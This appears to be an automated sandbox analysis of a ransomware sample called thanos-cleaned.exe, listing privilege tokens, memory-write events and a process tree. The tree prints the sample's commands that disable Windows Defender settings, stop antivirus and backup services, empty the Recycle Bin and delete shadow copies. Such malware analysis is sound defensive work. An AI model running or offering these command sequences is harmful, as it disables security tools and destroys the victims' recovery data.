Token: SeIncreaseQuotaPrivilege	3104	powershell.exe
Token: SeSecurityPrivilege	3104	powershell.exe
Token: SeTakeOwnershipPrivilege	3104	powershell.exe
Token: SeLoadDriverPrivilege	3104	powershell.exe
Token: SeSystemProfilePrivilege	3104	powershell.exe
Token: SeSystemtimePrivilege	3104	powershell.exe
Token: SeProfSingleProcessPrivilege	3104	powershell.exe
Token: SeIncBasePriorityPrivilege	3104	powershell.exe
Token: SeCreatePagefilePrivilege	3104	powershell.exe
Token: SeBackupPrivilege	3104	powershell.exe
Token: SeRestorePrivilege	3104	powershell.exe
Token: SeShutdownPrivilege	3104	powershell.exe
Token: SeDebugPrivilege	3104	powershell.exe
Token: SeSystemEnvironmentPrivilege	3104	powershell.exe
Token: SeRemoteShutdownPrivilege	3104	powershell.exe
Token: SeUndockPrivilege	3104	powershell.exe
Token: SeManageVolumePrivilege	3104	powershell.exe
Token: 33	3104	powershell.exe
Token: 34	3104	powershell.exe
Token: 35	3104	powershell.exe
Token: 36	3104	powershell.exe
Token: SeDebugPrivilege	5104	powershell.exe
Token: SeIncreaseQuotaPrivilege	4168	powershell.exe
Token: SeSecurityPrivilege	4168	powershell.exe
Token: SeTakeOwnershipPrivilege	4168	powershell.exe
Token: SeLoadDriverPrivilege	4168	powershell.exe
Token: SeSystemProfilePrivilege	4168	powershell.exe
Token: SeSystemtimePrivilege	4168	powershell.exe
Token: SeProfSingleProcessPrivilege	4168	powershell.exe
Token: SeIncBasePriorityPrivilege	4168	powershell.exe
Token: SeCreatePagefilePrivilege	4168	powershell.exe
Token: SeBackupPrivilege	4168	powershell.exe
Token: SeRestorePrivilege	4168	powershell.exe
Token: SeShutdownPrivilege	4168	powershell.exe
Token: SeDebugPrivilege	4168	powershell.exe
Token: SeSystemEnvironmentPrivilege	4168	powershell.exe
Token: SeRemoteShutdownPrivilege	4168	powershell.exe
Token: SeUndockPrivilege	4168	powershell.exe
Token: SeManageVolumePrivilege	4168	powershell.exe
Token: 33	4168	powershell.exe
Token: 34	4168	powershell.exe
Token: 35	4168	powershell.exe
Token: 36	4168	powershell.exe
Token: SeIncreaseQuotaPrivilege	4348	powershell.exe
Token: SeSecurityPrivilege	4348	powershell.exe
Token: SeTakeOwnershipPrivilege	4348	powershell.exe
Token: SeLoadDriverPrivilege	4348	powershell.exe
Token: SeSystemProfilePrivilege	4348	powershell.exe
Token: SeSystemtimePrivilege	4348	powershell.exe
Token: SeProfSingleProcessPrivilege	4348	powershell.exe
Token: SeIncBasePriorityPrivilege	4348	powershell.exe
Token: SeCreatePagefilePrivilege	4348	powershell.exe
Token: SeBackupPrivilege	4348	powershell.exe
Token: SeRestorePrivilege	4348	powershell.exe
Token: SeShutdownPrivilege	4348	powershell.exe
Token: SeDebugPrivilege	4348	powershell.exe
Token: SeSystemEnvironmentPrivilege	4348	powershell.exe
Token: SeRemoteShutdownPrivilege	4348	powershell.exe
Token: SeUndockPrivilege	4348	powershell.exe
Token: SeManageVolumePrivilege	4348	powershell.exe
Token: 33	4348	powershell.exe
Token: 34	4348	powershell.exe
Token: 35	4348	powershell.exe
Token: 36	4348	powershell.exe
Token: SeIncreaseQuotaPrivilege	4992	powershell.exe
Token: SeSecurityPrivilege	4992	powershell.exe
Token: SeTakeOwnershipPrivilege	4992	powershell.exe
Token: SeLoadDriverPrivilege	4992	powershell.exe
Token: SeSystemProfilePrivilege	4992	powershell.exe
Token: SeSystemtimePrivilege	4992	powershell.exe
Token: SeProfSingleProcessPrivilege	4992	powershell.exe
Token: SeIncBasePriorityPrivilege	4992	powershell.exe
Token: SeCreatePagefilePrivilege	4992	powershell.exe
Token: SeBackupPrivilege	4992	powershell.exe
Token: SeRestorePrivilege	4992	powershell.exe
Token: SeShutdownPrivilege	4992	powershell.exe
Token: SeDebugPrivilege	4992	powershell.exe
Token: SeSystemEnvironmentPrivilege	4992	powershell.exe
Token: SeRemoteShutdownPrivilege	4992	powershell.exe
Token: SeUndockPrivilege	4992	powershell.exe
Token: SeManageVolumePrivilege	4992	powershell.exe
Token: 33	4992	powershell.exe
Token: 34	4992	powershell.exe
Token: 35	4992	powershell.exe
Token: 36	4992	powershell.exe
Token: SeIncreaseQuotaPrivilege	5044	powershell.exe
Token: SeSecurityPrivilege	5044	powershell.exe
Token: SeTakeOwnershipPrivilege	5044	powershell.exe
Token: SeLoadDriverPrivilege	5044	powershell.exe
Token: SeSystemProfilePrivilege	5044	powershell.exe
Token: SeSystemtimePrivilege	5044	powershell.exe
Token: SeProfSingleProcessPrivilege	5044	powershell.exe
Token: SeIncBasePriorityPrivilege	5044	powershell.exe
Token: SeCreatePagefilePrivilege	5044	powershell.exe
Token: SeBackupPrivilege	5044	powershell.exe
Token: SeRestorePrivilege	5044	powershell.exe
Token: SeShutdownPrivilege	5044	powershell.exe
Token: SeDebugPrivilege	5044	powershell.exe
Token: SeSystemEnvironmentPrivilege	5044	powershell.exe
Token: SeRemoteShutdownPrivilege	5044	powershell.exe
Token: SeUndockPrivilege	5044	powershell.exe
Token: SeManageVolumePrivilege	5044	powershell.exe
Token: 33	5044	powershell.exe
Token: 34	5044	powershell.exe
Token: 35	5044	powershell.exe
Token: 36	5044	powershell.exe
Token: SeIncreaseQuotaPrivilege	5104	powershell.exe
Token: SeSecurityPrivilege	5104	powershell.exe
Token: SeTakeOwnershipPrivilege	5104	powershell.exe
Token: SeLoadDriverPrivilege	5104	powershell.exe
Token: SeSystemProfilePrivilege	5104	powershell.exe
Token: SeSystemtimePrivilege	5104	powershell.exe
Token: SeProfSingleProcessPrivilege	5104	powershell.exe
Token: SeIncBasePriorityPrivilege	5104	powershell.exe
Token: SeCreatePagefilePrivilege	5104	powershell.exe
Token: SeBackupPrivilege	5104	powershell.exe
Token: SeRestorePrivilege	5104	powershell.exe
Token: SeShutdownPrivilege	5104	powershell.exe
Token: SeDebugPrivilege	5104	powershell.exe
Token: SeSystemEnvironmentPrivilege	5104	powershell.exe
Token: SeRemoteShutdownPrivilege	5104	powershell.exe
Token: SeUndockPrivilege	5104	powershell.exe
Token: SeManageVolumePrivilege	5104	powershell.exe
Token: 33	5104	powershell.exe
Token: 34	5104	powershell.exe
Token: 35	5104	powershell.exe
Token: 36	5104	powershell.exe
Token: SeDebugPrivilege	6208	taskkill.exe
Token: SeDebugPrivilege	6200	taskkill.exe
Token: SeDebugPrivilege	6192	taskkill.exe
Token: SeBackupPrivilege	5644	vssvc.exe
Token: SeRestorePrivilege	5644	vssvc.exe
Token: SeAuditPrivilege	5644	vssvc.exe
Token: SeAssignPrimaryTokenPrivilege	5864	2kx1y5bm.exe
Token: SeIncreaseQuotaPrivilege	5864	2kx1y5bm.exe
Token: SeImpersonatePrivilege	5864	2kx1y5bm.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe

Suspicious use of WriteProcessMemory 233 IoCs

description	pid	Process	procid_target
PID 756 wrote to memory of 1196	756	thanos-cleaned.exe	72
PID 756 wrote to memory of 1196	756	thanos-cleaned.exe	72
PID 756 wrote to memory of 796	756	thanos-cleaned.exe	78
PID 756 wrote to memory of 796	756	thanos-cleaned.exe	78
PID 756 wrote to memory of 2296	756	thanos-cleaned.exe	80
PID 756 wrote to memory of 2296	756	thanos-cleaned.exe	80
PID 756 wrote to memory of 2136	756	thanos-cleaned.exe	82
PID 756 wrote to memory of 2136	756	thanos-cleaned.exe	82
PID 756 wrote to memory of 3980	756	thanos-cleaned.exe	84
PID 756 wrote to memory of 3980	756	thanos-cleaned.exe	84
PID 756 wrote to memory of 820	756	thanos-cleaned.exe	86
PID 756 wrote to memory of 820	756	thanos-cleaned.exe	86
PID 756 wrote to memory of 3104	756	thanos-cleaned.exe	88
PID 756 wrote to memory of 3104	756	thanos-cleaned.exe	88
PID 756 wrote to memory of 1056	756	thanos-cleaned.exe	90
PID 756 wrote to memory of 1056	756	thanos-cleaned.exe	90
PID 756 wrote to memory of 4168	756	thanos-cleaned.exe	92
PID 756 wrote to memory of 4168	756	thanos-cleaned.exe	92
PID 756 wrote to memory of 4348	756	thanos-cleaned.exe	94
PID 756 wrote to memory of 4348	756	thanos-cleaned.exe	94
PID 756 wrote to memory of 4992	756	thanos-cleaned.exe	96
PID 756 wrote to memory of 4992	756	thanos-cleaned.exe	96
PID 756 wrote to memory of 5044	756	thanos-cleaned.exe	98
PID 756 wrote to memory of 5044	756	thanos-cleaned.exe	98
PID 756 wrote to memory of 5104	756	thanos-cleaned.exe	100
PID 756 wrote to memory of 5104	756	thanos-cleaned.exe	100
PID 756 wrote to memory of 4216	756	thanos-cleaned.exe	252
PID 756 wrote to memory of 4216	756	thanos-cleaned.exe	252
PID 756 wrote to memory of 4260	756	thanos-cleaned.exe	101
PID 756 wrote to memory of 4260	756	thanos-cleaned.exe	101
PID 756 wrote to memory of 4364	756	thanos-cleaned.exe	250
PID 756 wrote to memory of 4364	756	thanos-cleaned.exe	250
PID 756 wrote to memory of 4460	756	thanos-cleaned.exe	144
PID 756 wrote to memory of 4460	756	thanos-cleaned.exe	144
PID 756 wrote to memory of 4336	756	thanos-cleaned.exe	103
PID 756 wrote to memory of 4336	756	thanos-cleaned.exe	103
PID 756 wrote to memory of 4888	756	thanos-cleaned.exe	104
PID 756 wrote to memory of 4888	756	thanos-cleaned.exe	104
PID 756 wrote to memory of 5012	756	thanos-cleaned.exe	244
PID 756 wrote to memory of 5012	756	thanos-cleaned.exe	244
PID 756 wrote to memory of 4544	756	thanos-cleaned.exe	105
PID 756 wrote to memory of 4544	756	thanos-cleaned.exe	105
PID 756 wrote to memory of 4012	756	thanos-cleaned.exe	106
PID 756 wrote to memory of 4012	756	thanos-cleaned.exe	106
PID 756 wrote to memory of 5112	756	thanos-cleaned.exe	107
PID 756 wrote to memory of 5112	756	thanos-cleaned.exe	107
PID 756 wrote to memory of 5136	756	thanos-cleaned.exe	108
PID 756 wrote to memory of 5136	756	thanos-cleaned.exe	108
PID 4216 wrote to memory of 5148	4216	net.exe	240
PID 4216 wrote to memory of 5148	4216	net.exe	240
PID 756 wrote to memory of 5208	756	thanos-cleaned.exe	109
PID 756 wrote to memory of 5208	756	thanos-cleaned.exe	109
PID 4260 wrote to memory of 5220	4260	net.exe	238
PID 4260 wrote to memory of 5220	4260	net.exe	238
PID 756 wrote to memory of 5268	756	thanos-cleaned.exe	237
PID 756 wrote to memory of 5268	756	thanos-cleaned.exe	237
PID 4364 wrote to memory of 5308	4364	net.exe	235
PID 4364 wrote to memory of 5308	4364	net.exe	235
PID 4460 wrote to memory of 5316	4460	net1.exe	234
PID 4460 wrote to memory of 5316	4460	net1.exe	234
PID 756 wrote to memory of 5340	756	thanos-cleaned.exe	111
PID 756 wrote to memory of 5340	756	thanos-cleaned.exe	111
PID 4336 wrote to memory of 5368	4336	net.exe	233
PID 4336 wrote to memory of 5368	4336	net.exe	233
PID 756 wrote to memory of 5392	756	thanos-cleaned.exe	232
PID 756 wrote to memory of 5392	756	thanos-cleaned.exe	232
PID 756 wrote to memory of 5432	756	thanos-cleaned.exe	230
PID 756 wrote to memory of 5432	756	thanos-cleaned.exe	230
PID 4888 wrote to memory of 5452	4888	net.exe	113
PID 4888 wrote to memory of 5452	4888	net.exe	113
PID 756 wrote to memory of 5500	756	thanos-cleaned.exe	228
PID 756 wrote to memory of 5500	756	thanos-cleaned.exe	228
PID 5012 wrote to memory of 5524	5012	net.exe	227
PID 5012 wrote to memory of 5524	5012	net.exe	227
PID 756 wrote to memory of 5580	756	thanos-cleaned.exe	114
PID 756 wrote to memory of 5580	756	thanos-cleaned.exe	114
PID 4544 wrote to memory of 5612	4544	net.exe	225
PID 4544 wrote to memory of 5612	4544	net.exe	225
PID 756 wrote to memory of 5636	756	thanos-cleaned.exe	224
PID 756 wrote to memory of 5636	756	thanos-cleaned.exe	224
PID 4012 wrote to memory of 5660	4012	net.exe	223
PID 4012 wrote to memory of 5660	4012	net.exe	223
PID 5112 wrote to memory of 5700	5112	net.exe	221
PID 5112 wrote to memory of 5700	5112	net.exe	221
PID 756 wrote to memory of 5708	756	thanos-cleaned.exe	261
PID 756 wrote to memory of 5708	756	thanos-cleaned.exe	261
PID 756 wrote to memory of 5760	756	thanos-cleaned.exe	218
PID 756 wrote to memory of 5760	756	thanos-cleaned.exe	218
PID 5136 wrote to memory of 5772	5136	net.exe	116
PID 5136 wrote to memory of 5772	5136	net.exe	116
PID 756 wrote to memory of 5812	756	thanos-cleaned.exe	117
PID 756 wrote to memory of 5812	756	thanos-cleaned.exe	117
PID 756 wrote to memory of 5876	756	thanos-cleaned.exe	118
PID 756 wrote to memory of 5876	756	thanos-cleaned.exe	118
PID 5208 wrote to memory of 5900	5208	net.exe	215
PID 5208 wrote to memory of 5900	5208	net.exe	215
PID 5268 wrote to memory of 5940	5268	net.exe	119
PID 5268 wrote to memory of 5940	5268	net.exe	119
PID 756 wrote to memory of 5956	756	thanos-cleaned.exe	120
PID 756 wrote to memory of 5956	756	thanos-cleaned.exe	120
PID 756 wrote to memory of 6004	756	thanos-cleaned.exe	212
PID 756 wrote to memory of 6004	756	thanos-cleaned.exe	212
PID 5392 wrote to memory of 6032	5392	net.exe	211
PID 5392 wrote to memory of 6032	5392	net.exe	211
PID 5340 wrote to memory of 6048	5340	net.exe	121
PID 5340 wrote to memory of 6048	5340	net.exe	121
PID 756 wrote to memory of 6104	756	thanos-cleaned.exe	209
PID 756 wrote to memory of 6104	756	thanos-cleaned.exe	209
PID 5432 wrote to memory of 6128	5432	net.exe	122
PID 5432 wrote to memory of 6128	5432	net.exe	122
PID 756 wrote to memory of 5128	756	thanos-cleaned.exe	207
PID 756 wrote to memory of 5128	756	thanos-cleaned.exe	207
PID 756 wrote to memory of 5328	756	thanos-cleaned.exe	205
PID 756 wrote to memory of 5328	756	thanos-cleaned.exe	205
PID 5500 wrote to memory of 5276	5500	net.exe	123
PID 5500 wrote to memory of 5276	5500	net.exe	123
PID 756 wrote to memory of 4292	756	thanos-cleaned.exe	203
PID 756 wrote to memory of 4292	756	thanos-cleaned.exe	203
PID 5580 wrote to memory of 5588	5580	net.exe	124
PID 5580 wrote to memory of 5588	5580	net.exe	124
PID 756 wrote to memory of 5532	756	thanos-cleaned.exe	125
PID 756 wrote to memory of 5532	756	thanos-cleaned.exe	125
PID 756 wrote to memory of 5964	756	thanos-cleaned.exe	200
PID 756 wrote to memory of 5964	756	thanos-cleaned.exe	200
PID 5708 wrote to memory of 6040	5708	Conhost.exe	199
PID 5708 wrote to memory of 6040	5708	Conhost.exe	199
PID 5636 wrote to memory of 3648	5636	net.exe	198
PID 5636 wrote to memory of 3648	5636	net.exe	198
PID 756 wrote to memory of 1196	756	thanos-cleaned.exe	197
PID 756 wrote to memory of 1196	756	thanos-cleaned.exe	197
PID 756 wrote to memory of 5264	756	thanos-cleaned.exe	196
PID 756 wrote to memory of 5264	756	thanos-cleaned.exe	196
PID 756 wrote to memory of 5948	756	thanos-cleaned.exe	195
PID 756 wrote to memory of 5948	756	thanos-cleaned.exe	195
PID 756 wrote to memory of 6140	756	thanos-cleaned.exe	194
PID 756 wrote to memory of 6140	756	thanos-cleaned.exe	194
PID 756 wrote to memory of 6148	756	thanos-cleaned.exe	193
PID 756 wrote to memory of 6148	756	thanos-cleaned.exe	193
PID 756 wrote to memory of 6156	756	thanos-cleaned.exe	192
PID 756 wrote to memory of 6156	756	thanos-cleaned.exe	192
PID 756 wrote to memory of 6164	756	thanos-cleaned.exe	191
PID 756 wrote to memory of 6164	756	thanos-cleaned.exe	191
PID 756 wrote to memory of 6172	756	thanos-cleaned.exe	190
PID 756 wrote to memory of 6172	756	thanos-cleaned.exe	190
PID 756 wrote to memory of 6180	756	thanos-cleaned.exe	189
PID 756 wrote to memory of 6180	756	thanos-cleaned.exe	189
PID 756 wrote to memory of 6192	756	thanos-cleaned.exe	188
PID 756 wrote to memory of 6192	756	thanos-cleaned.exe	188
PID 756 wrote to memory of 6200	756	thanos-cleaned.exe	187
PID 756 wrote to memory of 6200	756	thanos-cleaned.exe	187
PID 756 wrote to memory of 6208	756	thanos-cleaned.exe	186
PID 756 wrote to memory of 6208	756	thanos-cleaned.exe	186
PID 5760 wrote to memory of 6216	5760	net.exe	185
PID 5760 wrote to memory of 6216	5760	net.exe	185
PID 756 wrote to memory of 6220	756	thanos-cleaned.exe	184
PID 756 wrote to memory of 6220	756	thanos-cleaned.exe	184
PID 756 wrote to memory of 6232	756	thanos-cleaned.exe	183
PID 756 wrote to memory of 6232	756	thanos-cleaned.exe	183
PID 756 wrote to memory of 6240	756	thanos-cleaned.exe	182
PID 756 wrote to memory of 6240	756	thanos-cleaned.exe	182
PID 756 wrote to memory of 6248	756	thanos-cleaned.exe	181
PID 756 wrote to memory of 6248	756	thanos-cleaned.exe	181
PID 756 wrote to memory of 6256	756	thanos-cleaned.exe	180
PID 756 wrote to memory of 6256	756	thanos-cleaned.exe	180
PID 756 wrote to memory of 6264	756	thanos-cleaned.exe	179
PID 756 wrote to memory of 6264	756	thanos-cleaned.exe	179
PID 756 wrote to memory of 6272	756	thanos-cleaned.exe	178
PID 756 wrote to memory of 6272	756	thanos-cleaned.exe	178
PID 756 wrote to memory of 6280	756	thanos-cleaned.exe	177
PID 756 wrote to memory of 6280	756	thanos-cleaned.exe	177
PID 756 wrote to memory of 6288	756	thanos-cleaned.exe	176
PID 756 wrote to memory of 6288	756	thanos-cleaned.exe	176
PID 756 wrote to memory of 6296	756	thanos-cleaned.exe	175
PID 756 wrote to memory of 6296	756	thanos-cleaned.exe	175
PID 756 wrote to memory of 6304	756	thanos-cleaned.exe	174
PID 756 wrote to memory of 6304	756	thanos-cleaned.exe	174
PID 756 wrote to memory of 6312	756	thanos-cleaned.exe	173
PID 756 wrote to memory of 6312	756	thanos-cleaned.exe	173
PID 756 wrote to memory of 6320	756	thanos-cleaned.exe	172
PID 756 wrote to memory of 6320	756	thanos-cleaned.exe	172
PID 756 wrote to memory of 6328	756	thanos-cleaned.exe	171
PID 756 wrote to memory of 6328	756	thanos-cleaned.exe	171
PID 756 wrote to memory of 6336	756	thanos-cleaned.exe	127
PID 756 wrote to memory of 6336	756	thanos-cleaned.exe	127
PID 5812 wrote to memory of 6744	5812	net.exe	131
PID 5812 wrote to memory of 6744	5812	net.exe	131
PID 5876 wrote to memory of 6756	5876	net.exe	128
PID 5876 wrote to memory of 6756	5876	net.exe	128
PID 5956 wrote to memory of 6920	5956	net.exe	259
PID 5956 wrote to memory of 6920	5956	net.exe	259
PID 6004 wrote to memory of 7044	6004	net.exe	152
PID 6004 wrote to memory of 7044	6004	net.exe	152
PID 6104 wrote to memory of 7052	6104	net.exe	151
PID 6104 wrote to memory of 7052	6104	net.exe	151
PID 5128 wrote to memory of 5908	5128	net.exe	150
PID 5128 wrote to memory of 5908	5128	net.exe	150
PID 5328 wrote to memory of 4692	5328	net.exe	141
PID 5328 wrote to memory of 4692	5328	net.exe	141
PID 4292 wrote to memory of 6616	4292	net.exe	149
PID 4292 wrote to memory of 6616	4292	net.exe	149
PID 5964 wrote to memory of 3984	5964	net.exe	148
PID 5964 wrote to memory of 3984	5964	net.exe	148
PID 5532 wrote to memory of 2644	5532	net.exe	147
PID 5532 wrote to memory of 2644	5532	net.exe	147
PID 1196 wrote to memory of 4268	1196	net.exe	266
PID 1196 wrote to memory of 4268	1196	net.exe	266
PID 5264 wrote to memory of 5172	5264	net.exe	142
PID 5264 wrote to memory of 5172	5264	net.exe	142
PID 6140 wrote to memory of 5308	6140	net.exe	235
PID 6140 wrote to memory of 5308	6140	net.exe	235
PID 5948 wrote to memory of 4460	5948	net.exe	144
PID 5948 wrote to memory of 4460	5948	net.exe	144
PID 6148 wrote to memory of 200	6148	net.exe	143
PID 6148 wrote to memory of 200	6148	net.exe	143
PID 756 wrote to memory of 6080	756	thanos-cleaned.exe	256
PID 756 wrote to memory of 6080	756	thanos-cleaned.exe	256
PID 756 wrote to memory of 5864	756	thanos-cleaned.exe	258
PID 756 wrote to memory of 5864	756	thanos-cleaned.exe	258
PID 756 wrote to memory of 5864	756	thanos-cleaned.exe	258
PID 756 wrote to memory of 6920	756	thanos-cleaned.exe	259
PID 756 wrote to memory of 6920	756	thanos-cleaned.exe	259
PID 756 wrote to memory of 7096	756	thanos-cleaned.exe	262
PID 756 wrote to memory of 7096	756	thanos-cleaned.exe	262
PID 756 wrote to memory of 4884	756	thanos-cleaned.exe	263
PID 756 wrote to memory of 4884	756	thanos-cleaned.exe	263
PID 756 wrote to memory of 6468	756	thanos-cleaned.exe	265
PID 756 wrote to memory of 6468	756	thanos-cleaned.exe	265
PID 4884 wrote to memory of 5484	4884	cmd.exe	267
PID 4884 wrote to memory of 5484	4884	cmd.exe	267
PID 6468 wrote to memory of 7140	6468	cmd.exe	268
PID 6468 wrote to memory of 7140	6468	cmd.exe	268
PID 4884 wrote to memory of 6352	4884	cmd.exe	271
PID 4884 wrote to memory of 6352	4884	cmd.exe	271

C:\Users\Admin\AppData\Local\Temp\thanos-cleaned.exe
"C:\Users\Admin\AppData\Local\Temp\thanos-cleaned.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:756
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1196
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:4268
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:796
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2296
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2136
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3980
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:820
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3104
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4168
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4348
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  PID:4992
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  PID:5044
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  PID:5104
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4260
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:5220
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:4460
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4336
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:5368
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:4888
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:5452
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:4544
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:5612
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:4012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:5660
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:5112
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:5700
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:5136
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:5772
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:5208
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:5900
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:5340
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:6048
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:5580
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:5588
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:5812
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:6744
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:5876
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:6756
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:5956
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:6920
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:5532
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:2644
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:6336
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:6328
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:6320
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:6312
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:6304
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:6296
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:6288
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:6280
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:6272
